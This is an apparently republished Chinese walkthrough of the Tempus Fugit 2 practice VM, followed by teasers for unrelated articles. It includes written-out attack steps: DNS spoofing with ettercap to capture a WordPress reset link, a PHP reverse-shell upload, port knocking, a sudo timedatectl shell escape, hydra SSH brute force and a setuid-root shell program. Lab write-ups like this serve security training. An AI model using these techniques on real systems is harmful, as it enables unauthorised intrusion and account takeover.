TEMPUS FUGIT: 2

news2024/11/23 14:59:36

环境准备

靶机链接:百度网盘 请输入提取码

提取码:5i9p

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2022.03

信息收集

1.对靶机进行端口和服务的扫描

nmap -sV -p- -A 10.10.10.130

可以看到22端口是关闭的

2.用gobuster扫描目录

gobuster dir -u http://10.10.10.130/ -w /usr/share/wordlists/dirb/big.txt -t 100

漏洞利用

1.访问网页,进入wordpress登录界面

2.发现一个域名写入/etc/hosts

3.用wpscan 进行用户枚举

wpscan --url http://tf2/ -e u

4.输入admin点击丢失密码

5.他这里说email发不了啥的。

6.用wireshark进行截取流量,发现dns

7.本地开启smtp服务,进行劫持

python -m smtpd -n -c DebuggingServer 10.10.10.128:25

vi /etc/ettercap/etter.dns

*.tempusfugit2.com A 10.10.10.128

所有访问域名的流量,会转到本地

8.ettercap -G 开启工具,设置目标ip

9.进行dns_spoof

10.回到登录网页,点击丢失密码

11.这边就成功劫持到,修改密码的链接

12.访问网址,查看到密码

http://TF2/wp-login.php?action=rp&key=c9tsuIZcEqW6qSoB4hBs&login=admin

m^F13sBwxPyGenqN

13.成功登录wordpress界面

14.修改404.php为php-reverse-shell.php的源码(github里有)

权限提升

1.反弹交互式shell

SHELL=bash script -q /dev/null

2.在网站的配置文件里发现,用户名密码

ElvisP

super.Secret.SQL.Password.For.ElvisP

3.并且这个shell是一个容器的shell

4.在/var/www/html/wp-content/TFDocuments/发现nb.txt

5.对内容进行base64解密,应该是用户名和密码

echo "ZG9ubjo5ZjRsdzByODJ5bzMK" | base64 -d

9f4lw0r82yo3

6.因为22端口是关闭的,只能通过knock敲门来打开

7.开启22端口

knock 10.10.10.130 1981 867 5309

8.成功登录donn用户

ssh donn@10.10.10.130

9.进行提权操作

sudo -u auria /usr/bin/timedatectl list-timezones

!/bin/sh

10.成功提权到auri用户

11.对auria用户进行爆破得到密码gateway

hydra -l auria -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.130 -t 50

gateway

12.登录auria用户后 ,发现该用户具有root权限免密执行/usr/bin/docker exec *

ssh auria@10.10.10.130

13.登录容器

sudo /usr/bin/docker exec -it 1786dd63dedb bash

cd /root/wp/wp-content

vi suid

int main(void) {
       setgid(0); setuid(0);
       execl("/bin/sh","sh",0);
}

根据之前root路径下有一个网站的wp-content文件夹,怀疑是主机与容器共享一个文件夹,通过刚刚的反弹shell(www-data用户权限)在/var/www/html/wp-content文件夹下面创建一个文件,

然后回来查看/root/wp/wp-content/文件夹确实多了一文件

最终提权失败!

参考:Tempus fugit 2 writeup

Tempus Fugit 2 靶机练习__誠的博客-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/531869.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

线段树-哈工大数据结构与算法作业

title: 线段树-哈工大作业 date: 2023-05-16 11:42:26 tags: 数据结构与算法 线段树 问题: 区间查询求和问题:给定一个含有n个整数序列的数组A,查询任意区间最大值与区间和的复杂度为O(n),若进行m次查询,则总的复杂度为O(mn)。…

深析AutosarNM 网络管理

深析AutosarNM 网络管理 深析AutosarNM 网络管理1. AutosarNM 网络管理相关的专业术语2. 各种模式下的各种状态下,报文的收发情况汇总如下表:3. AutosarNM网络管理使用的时间参数:4. AutosarNM网络管理唤醒请求(Wake Up Request)5. ​​​​​…

MySQL 5.7数据库下载与安装教程

说明: 安装环境:Win10 64位 软件版本:MySQL 5.7.35 解压版 一.下载 点击下载地址: MySQL :: Download MySQL Community Server (Archived Versions) https://downloads.mysql.com/archives/community/ 选择合适的版本下载 绿色框框 是正式版&#xff0…

第02讲:SpringCloudStream

一、什么是SpringCloudStream SpringCloudStream是SpringCloud的一个子项目,他提供了一套更加通用的操作MQ的解决方案 Destination Binder(目标绑定器) :微服务与消息中间件通信的组件Destination Bindings(目标绑定&…

2023爱分析・云原生 IDE 市场厂商评估报告-行云创新(CloudToGo)

1. 研究范围定义 企业数字化转型初期,通过资源池云化,解决了IDC时代运维、部署、扩容的难题,但传统应用单体架构厚重、烟囱式架构等带来的一系列应用层面的问题并没有得到有效解决,云对业务的价值主要还停留在资源供给的阶段…

Scaled dot-prodect Attention的原理和实现(附源码)

文章目录 背景什么是AttentionAttention权重的计算方法1. 多层感知机法2. Bilinear方法3. Dot Product4. Scaled Dot Product Scaled dot-prodect Attention的源码实现 背景 要了解深度学习中的Attention,就不得不先谈Encoder-Decoder框架(sequence to s…

拍立淘API接口说明文档 按图搜索淘宝商品API 实时数据返回

开发背景: 随着电商行业的不断发展,人们的购物需求日益增多。在购买商品时,很多人会通过搜索引擎、社交媒体等手段来获取信息或灵感。但是,在这些渠道中找到想要的商品并不容易,因为其中可能会混杂着一些广告或无关内…

Android内存优化检测工具LeakCanary使用

一、什么是LeakCanary leakCanary是Square开源框架,是一个Android和Java的内存泄露检测库。如果检测到某个activity有内存泄露,LeakCanary就是自动地显示一个通知,所以可以把它理解为傻瓜式的内存泄露检测工具。通过它可以大幅度减少开发中遇…

Java 并发队列详解

一,简介 1,并发队列两种实现 以ConcurrentLinkedQueue为代表的高性能非阻塞队列以BlockingQueue接口为代表的阻塞队列 2,阻塞队列与非阻塞队列的区别 当阻塞队列是空的时,从队列中获取元素的操作将会被阻塞,试图从…

【BFS】华子20230506笔试第三题(动态迷宫问题)Java实现

文章目录 题目链接思路BFS板子我的解答 题目链接 塔子哥的codeFun2000:http://101.43.147.120/p/P1251 测试样例1 输入 3 2 1 0 1 2 2 1 2 0 100 100 100 100 000 100 000 000 001输出 1测试样例2 输入 3 2 1 0 2 0 0 1 2 2 000 000 001 010 101 101 110 010 …

在docker容器中启动docker服务并实现构建多平台镜像的能力

在docker容器中启动docker服务并实现构建多平台镜像的能力 背景 在容器中运行docker,是devops中无法避免的场景,通常被应用于提供统一的镜像构建工具,出于安全考虑,不适合将主机的docker进程暴露给公司的内部人员使用&#xff0…

SpringCloud alibaba微服务b2b2c电子商务平台

1. 涉及平台 平台管理、商家端(PC端、手机端)、买家平台(H5/公众号、小程序、APP端(IOS/Android)、微服务平台(业务服务、系统服务、中间件服务) 2. 核心架构 Spring Cloud、Spring Boot2、My…

飞书开发流程

1、进入飞书并创建一个应用 链接: 创建应用 创建应用成功后需要审核通过,如果你拥有管理权限则可以自己进入管理后台通过审核,否则需要联系管理员通过审核 2、进入开发者后台 链接: 发者后台 3、在该调试平台上测试 以这个订阅审批事件为例 这一步…

DHCP协议简单配置

实验原理 网络中主机需要与外界进行通信时,需要配置自己的IP地址、网关地址、DNS服务器等网络参数信息。手工在每台主机上配置维护成本高,容易出错,而且不利于管理员统一维护。 通过DHCP地址自动配置协议,使终端设备能自动获取地址,实现即插即用且IP地址统一由服务器管理…

springboot+java充电桩充电额维修管理系统

项目介绍 Spring Boot 是 Spring 家族中的一个全新的框架,它用来简化Spring应用程序的创建和开发过程。也可以说 Spring Boot 能简化我们之前采用SSM(Spring MVC Spring MyBatis )框架进行开发的过程。 系统基于B/S即所谓浏览器/服务器模式…

STM32 学习笔记_9 定时器中断:编码器接口模式

TIM编码器接口 之前我们处理旋转编码器,是转一下中断一次,挺消耗资源的。 我们可以利用TIM的编码器功能,隔一段时间取一下旋转器值使得cnt或–,以此判断旋转位置以及计算速度,相比中断节约资源。相当于外接了一个有方…

Kubernetes那点事儿——暴露服务之Service

Kubernetes那点事儿——暴露服务之Service 前言一、Service二、Service与Pod关系三、Service常用类型ClusterIPNodePortLoadBalancer 四、Service代理模式IptablesIPVS修改代理模式 前言 K8s中,我们将应用跑在Pod里。多数情况下是一组Pod,用户如何访问这…

凌恩生物美文分享 | 提升科研有一套 | 宏基因组磷循环分析又出新!

磷是包括微生物在内的所有生命体中不可缺少的元素。在生物大分子核酸、高能量化合物ATP、以及生物体内糖代谢的某些中间体中,都有磷的存在。在自然界中,磷的循环包括可溶性无机磷的同化、有机磷的矿化、不溶性磷的溶解等。微生物分解含磷化合物的作用&am…

操作系统面试相关知识

目录 一、简介1、什么是操作系统2、操作系统主要有哪些功能? 二、操作系统结构1、什么是内核?2、什么是用户态和内核态?3、 用户态和内核态是如何切换的? 三、 进程和线程1、并行和并发有什么区别?2、什么是进程上下文…

无线传感器网络的时钟同步估计问题(Matlab代码实现)

目录 💥1 概述 📚2 运行结果 🎉3 参考文献 👨‍💻4 Matlab代码 💥1 概述 随着无线传感器网络的快速发展,其应用领域也越来越广。在诸多的应用环境中都需要大量已同步的传感器节点通过协同作用执行一个…